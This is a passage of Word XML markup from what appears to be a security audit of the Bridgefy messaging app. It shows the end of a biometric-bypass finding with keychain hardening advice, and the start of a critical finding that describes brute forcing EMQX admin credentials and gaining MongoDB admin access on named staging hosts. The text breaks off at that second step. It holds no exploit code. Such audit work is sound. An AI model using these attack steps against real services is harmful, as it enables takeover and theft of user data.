      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> app.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can now navigate all screens without access to the fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to require biometric authentication not only at application switch but also at application launch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>relevant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keychain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>items with an access control level of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>kSecAccessControlBiometryAny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>kSecAccessControlBiometryCurrentSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. This will ensure that the biometric security controls cannot be bypassed even with instrumentation attacks.</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7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487597056">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>191293</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="33" name="Graphic 33"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="33" name="Graphic 33"/>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5.062475pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15719424;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape24" coordorigin="1440,301" coordsize="2880,0" path="m1440,301l4320,301e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/security/.../ksecaccesscontrolbiometryany</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/security/.../ksecaccesscontrolbiometrycurrentset</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250045" w:id="10"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>EMQX/MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="980000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the EMQX and MongoDB server configurations have a number of weaknesses that can be chained together and allow for multiple takeover scenarios. These misconfigurations may assist unauthenticated attackers to obtain access to the MongoDB and the MQTT Dashboard with admin privileges. Please note this allows to modify and delete access to FCM tokens, prekeys, MQTT credentials, userId, phone number, alias, displayName, avatar, as well as direct messages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>encrypted message, messageId, to, from, status, readedAt, receivedAt, etc.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). These weaknesses are documented in more detail next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected Resources: </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:rPr>
            <w:i/>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.broker.bridgefy.services/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mongodb+srv://staging.whqu3.mongodb.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>illustrated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>unauthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trivially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EMQX Dashboard Admin Access by brute forcing admin credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
